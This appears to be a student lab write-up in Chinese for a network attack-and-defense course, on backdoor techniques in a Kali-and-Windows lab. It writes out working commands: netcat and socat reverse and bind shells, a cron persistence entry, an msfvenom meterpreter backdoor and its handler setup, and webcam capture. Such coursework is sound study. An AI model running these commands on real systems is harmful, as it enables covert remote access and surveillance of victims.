• 20154331黄芮EXP2 后门原理与实践


     EXP2 后门原理与实践

    实践内容

    使用netcat和socat、msf-meterpreter等工具获得主机权限,并进行一些恶意行为,如监控摄像头、记录键盘输入、截屏等。

    实验过程

    windows获得linux shell

    1、在windows中的命令提示符下用ipconfig指令找到主机ip

    .

     2、windows下使用C:UsersLenovoDesktop cat cat.exe -l -p 4331命令运行ncat.exe监听4331端口.

    3、kali下使用为nc 172.30.1.85(主机ip) 4331 -e /bin/sh命令连接windows的4331端口.

    4、没有反应表示连接成功,之后我们就可以在windows下获取kali的信息:

    linux获得windows的shell

    1、kali下使用nc -l -p 4331命令监听4331端口。

    2、利用ifconfig在kali中找到kali的IP地址:192.168.116.128

    3、在windows下使用C:UsersLenovoDesktop cat cat.exe -e cmd.exe 192.168.116.128(即kali的IP地址)连接kali的4331端口

    4、连接成功后,我们就可以在kali主机获取windows的信息,此时已成功获取windows的shell

     
    使用netcat传输数据

    1、windows下使用C:UsersLenovoDesktop cat cat.exe -l -p 4331命令运行ncat.exe监听4331端口.

    2、kali下使用为nc 172.30.1.85(主机ip) 4331命令连接windows的4331端口。

    3、建立连接后,两边就可以进行传输。

    Windows下:

    虚拟机下:

     

    cron启动

    1、windows下使用C:UsersLenovoDesktop cat cat.exe -l -p 4331命令运行ncat.exe监听4331端口.

    2、kali下使用crontab -e命令,设置一条定时指令,由于做的时候时间为19:13,所以我设置成在每小时的第17分钟反向连接windows主机的4331端口

    输入指令 17* * * * /bin/netcat 172.30.1.85 4331 -e /bin/sh后按ctrl+x离开,并保存。

    3、等到时间为17分钟的时候,在windows端用ls指令查看。

    socat

    socat获取主机操作Shell, 任务计划启动。

    1、在windows下的控制面板--->管理工具--->任务计划程序中新建一个触发器,民称为20154331.

     

    2、再新建一个操作,在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:4331 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口4331,同时把cmd.exe的stderr重定向到stdout上:

    3、创建完成之后运行它。

    4、然后在kali下使用指令socat - tcp:172.30.1.85(主机ip):4331(端口),这个时候就成功获取windows的shell。

    msf-meterpreter

    msf-meterpreter 生成后门,传输到靶机获取shell

    1、在kali下输入命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.116.128 LPORT=4331 -f exe > 20154331.exe

        生成一个名为20154331的后门程序

    2、使用netcat将这个后门程序传输到windows主机上。

    首先我们在windows下输入ncat.exe -lv 4331 > 20154331.exe

    随后在Linux下使用ncat -nv 172.30.1.85 4331 < 20154331.exe命令把文件传送过去

    使用msf获取目标摄像头,进行录屏、键盘记录等操作

    1、首先msf打开监听进程,msfconsole :进入msf

    2、use exploit/multi/handler:进入handler模式

         set payload windows/meterpreter/reverse_tcp :设置payload

         set LHOST 192.168.116.128 :将LHOST设置为LinuxIP地址

         set LPORT 4331 :设端口为那个4331exploit //MSF开始监听

    3、获取windows系统的具体信息:

    4、使用webcam_snap指令可以使用摄像头进行拍照:

    基础问题回答

    (1)例举你能想到的一个后门进入到你系统中的可能方式?

    答:将后门程序捆绑在可执行程序中,或者捆绑在某个软件里。

    (2)例举你知道的后门如何启动起来(win及linux)的方式?

    答:伪装成文件或常用软件,等待用户点击。

    (3)Meterpreter有哪些给你映像深刻的功能?

    答:可以打开摄像头和录音,挺可怕的。

    (4)如何发现自己有系统有没有被安装后门?

    答:查看电脑的开机项,检测是否有未知项,或者用杀毒软件扫。

    实验心得:

           这是网络攻防的第二次实验。能够利用后门查看他人电脑信息,获取他人摄像头权限进行录拍,还有录音。突然发现网络并不安全,我觉得我们还是要时刻警惕自己的电脑以防入侵。虽然我们只学了几节课,但是还是觉得网络攻防不是那么简单的,还有很多值得我们去学习。

  • 相关阅读:
    团队作业8----第二次项目冲刺(beta阶段)5.20
    团队作业8——第二次项目冲刺(Beta阶段) 5.19
    团队作业8——Beta项目(冲刺计划)
    团队作业——Alpha冲刺之事后诸葛亮
    团队作业5——测试与发布(Alpha版本)
    团队作业6——展示博客(Alpha版本)
    团队作业4——第一次项目冲刺(Alpha版本)2017.4.28
    团队作业4——第一次项目冲刺(Alpha版本)2017.4.27
    团队作业4——第一次项目冲刺(Alpha版本)2017.4.26
    团队作业4——第一次项目冲刺(Alpha版本)2017.4.25
  • 原文地址:https://www.cnblogs.com/20154331huangrui/p/8666600.html
Copyright © 2020-2023  润新知